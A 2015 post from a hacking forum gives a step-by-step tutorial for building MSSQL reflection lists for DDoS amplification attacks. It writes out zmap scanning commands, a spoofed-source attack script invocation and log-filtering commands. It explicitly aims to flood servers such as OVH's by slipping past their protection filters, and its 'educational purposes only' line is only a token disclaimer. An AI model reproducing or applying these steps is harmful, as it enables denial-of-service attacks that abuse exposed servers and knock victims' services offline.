i4info Provides the best hacking Material. Latest hacking tutorials and tools are available here. It is the best place for hackers.

Latest topics

» Group hackers
Sat Apr 15, 2017 2:37 pm by Group Hackers

» Hacker Needed
Sat Apr 15, 2017 3:57 am by Group Hackers

» Hacker Needed
Sat Apr 15, 2017 1:45 am by Group Hackers

» Hacker Needed
Thu Apr 13, 2017 11:10 pm by Group Hackers

» Hacker Needed
Tue Apr 11, 2017 2:07 pm by Group Hackers

» Hacker Needed
Tue Apr 11, 2017 2:21 am by Group Hackers

» Hacker Needed
Tue Apr 11, 2017 2:06 am by Group Hackers

» Hacker Needed
Tue Apr 11, 2017 1:35 am by Group Hackers

» Hacker Needed
Tue Apr 11, 2017 1:05 am by Group Hackers

April 2017


Calendar Calendar


free forum

Forumotion on Facebook Forumotion on Twitter Forumotion on YouTubeForumotion on Google+

Visitors Counter

Flag Counter

How to scan MSSQL amplified


Posts : 474
Reputation : 8
Join date : 2014-12-10
Age : 24
Location : Pakistan

How to scan MSSQL amplified

Post by Admin on Fri Jan 02, 2015 9:51 pm

What you need:
100Mbps/1Gbps dedicated server or XEN/KVM VPS. (OpenVZ VPS's wont work)
OVH Dropper attack script: You can either buy it or find the public version. Ask a few people.
You will also need a spoofable server.
mssql_1434.pkt: [You must be registered and logged in to see this link.]
CentOS 6/7

Note* This method works very well and is super fast, its not the easiest though. MSSQL has a 10x amplification factor. It's overall a very bad amplification method but works well against protected servers such as OVH since the filter does not catch it and treats the traffic as legitimate traffic therefor allowing it to flood the port.

How to create MSSQL amplification lists

- Update your server.

<code>yum -y update</code>

- Install dependencies.

yum -y install zmap php python perl make gcc build-essential cmake libgmp3-dev libpcap-dev gengetopt byacc flex

- Download the mssql_1434.pkt and place in root directory.

- Run the zmap command.

zmap -p 1434 -M udp --probe-args=file:/root/mssql_1434.pkt -o mssql_1434.txt

Note* The scan will take 2 hours on a 1Gbps server. Please wait until its
completely finished scanning.

- Upload the mssql_1434.txt list to a spoof-enabled server

- Connect to your spoof-enabled server and install the dependencies.

yum -y install iptraf

- Run iptraf.


- Enable logging in iptraf.

Configure > Logging (Push enter)

[Image: ywTJFIQ.png]

- Create a UDP filter in iptraf.


Fitlers > IP > Define new filter > Name: MSSQL > CTRL-A

[Image: sQxHbBh.png]

- Apply the filter.
- Exit the menu.
- Select "IP traffic monitor".

- Select Eth0/Eth1 or the lowest interface on the list.
[Image: 6b6WdWs.png]

- Select the location in which the log file will be stored.
[Image: 7FClobf.png]

- Open another putty session on your spoofable server.

- Use the MSSQL/OVH dropper attack script and attack your own server using the mssql_1434.txt you made ealier.
Note* Change the IP to what ever your spoofable servers ip is.


./mssql 1434 mssql_1434.txt 1 2600

- In iptraf you should see a bunch of IPs incoming.

- Once the attack is over close iptraf.


- Change to the directory where your iptraf logfile is stored.
Note* change /root to what ever directory its stored in.


cd /root

- Take out all the responses that replied with over 199 bytes and store them in 200bytes.txt.


awk '$8 > 199' dongs.txt > 200bytes.txt

- Remove everything but the bare IPs into 200bytesips.txt.


grep -Eo "[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}" 200bytes.txt > 200bytesips.txt

- Remove duplicates and randomly sort.


sort 200bytesips.txt | uniq -u > 200bytescleaned.txt; sort --random-sort 200bytescleaned.txt > done.txt

Done! Enjoy your list.

More information:
- If you need help, post below.
- 200Bytes seems to work best and last the longest, I suggest messing around though.
- Server freezing? Limit the zmap bandwidth with:



Add that behind the port. 10M = 100Mbps. Change as you like.

Please leave a thanks if you enjoyed this tutorial.

This is for educational purposes only.

    Current date/time is Wed Apr 26, 2017 6:05 am